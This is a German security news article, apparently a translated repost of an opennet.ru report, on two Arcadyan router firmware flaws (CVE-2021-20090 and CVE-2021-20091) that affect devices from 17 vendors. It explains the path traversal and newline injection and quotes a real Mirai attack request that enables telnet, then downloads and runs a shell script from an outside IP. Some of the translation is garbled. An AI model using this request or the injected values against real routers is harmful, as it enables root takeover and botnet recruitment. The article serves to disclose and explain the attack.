SicherheitsanfÀlligkeit bei Heimroutern, die 17 Hersteller betrifft

Im Netzwerk wurde ein massiver Angriff auf Heimrouter festgestellt, in deren Firmware die HTTP-Server-Implementierung von Arcadyan verwendet wird. Zur Übernahme der Kontrolle ĂŒber die GerĂ€te wird eine Kombination aus zwei Schwachstellen genutzt, die es ermöglicht, beliebigen Code mit Root-Rechten remote auszufĂŒhren. Das Problem betrifft eine Vielzahl von ADSL-Routern von Arcadyan, ASUS und Buffalo sowie GerĂ€ten, die unter den Marken Beeline (das Problem wurde im Smart Box Flash bestĂ€tigt), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone und anderen Telekommunikationsanbietern angeboten werden. Es wird darauf hingewiesen, dass das Problem in Arcadyan-Firmware bereits seit mehr als 10 Jahren besteht und in dieser Zeit in mindestens 20 Modelle von 17 verschiedenen Herstellern ĂŒbernommen wurde.

Die erste SicherheitsanfĂ€lligkeit CVE-2021-20090 ermöglicht den Zugriff auf jedes Skript der Webschnittstelle, ohne sich authentifizieren zu mĂŒssen. Der Kern der Schwachstelle liegt darin, dass in der Webschnittstelle einige Verzeichnisse, ĂŒber die Bilder, CSS-Dateien und JavaScript-Skripte bereitgestellt werden, ohne Authentifizierung zugĂ€nglich sind. Dabei erfolgt die ÜberprĂŒfung der Verzeichnisse, fĂŒr die der Zugriff ohne Authentifizierung erlaubt ist, anhand des bestimmten Musters. Die Angabe von Zeichen wie „..\/“ in den Pfaden zum Wechseln in das ĂŒbergeordnete Verzeichnis wird durch die Firmware blockiert, aber die Verwendung der Kombination „..“ wird durchgelassen. Somit besteht die Möglichkeit, geschĂŒtzte Seiten zu öffnen, indem Anfragen wie „http:\/\/192.168.1.1\/images\/..index.htm“ gesendet werden.

Die zweite SicherheitsanfĂ€lligkeit CVE-2021-20091 erlaubt einem authentifizierten Benutzer, Änderungen an den Systemeinstellungen des GerĂ€ts vorzunehmen, indem er speziell formatierte Parameter an das Skript apply_abstract.cgi sendet, das die ÜberprĂŒfung des Vorhandenseins eines Zeilenumbruchs in den Parametern nicht durchfĂŒhrt. Beispielsweise kann ein Angreifer bei der AusfĂŒhrung des Ping-Befehls im Feld fĂŒr die zu prĂŒfende IP-Adresse den Wert „192.168.1.2ARC_SYS_TelnetdEnable=1“ angeben, und das Skript wird beim Erstellen der Datei mit den Einstellungen /tmp/etc/config/.glbcfg die Zeile „AARC_SYS_TelnetdEnable=1“ einfĂŒgen, die aktiviert. Server telnetd, das uneingeschrĂ€nkten Zugriff auf die Shell mit Root-Rechten gewĂ€hrt. Ebenso kann durch Setzen des Parameters AARC_SYS beliebiger Code im System ausgefĂŒhrt werden. Die erste SicherheitsanfĂ€lligkeit ermöglicht das AusfĂŒhren des fehlerhaften Skripts ohne Authentifizierung, indem man es als „\/images\/..apply_abstract.cgi“ anruft.

Um Schwachstellen auszunutzen, muss der Angreifer die Möglichkeit haben, eine Anfrage an den Netzwerkport zu senden, an dem das Web-Interface lĂ€uft. Angesichts der Dynamik der Angriffsverbreitung lassen viele Anbieter den Zugang zu ihren GerĂ€ten aus dem externen Netzwerk zu, um die Diagnose von Problemen durch den Support zu erleichtern. Wenn der Zugang zum Interface nur fĂŒr das interne Netzwerk eingeschrĂ€nkt ist, kann der Angriff aus dem externen Netzwerk mittels der Technik „DNS-Rebinding“ erfolgen. Schwachstellen werden bereits aktiv genutzt, um Router mit dem Botnetz Mirai zu verbinden: POST /images/..apply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time5&ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1& ARC_SYS_=cd+\/tmp; wget+http:\/\/212.192.241.72\/lolol.sh; curl+-O+http:\/\/212.192.241.72\/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Quelle: opennet.ru

ZuverlĂ€ssiges Hosting fĂŒr Websites mit DDoS-Schutz kaufen, VPS VDS Server đŸ”„ ZuverlĂ€ssiges Hosting fĂŒr Websites mit DDoS-Schutz kaufen, VPS VDS Server - ProHoster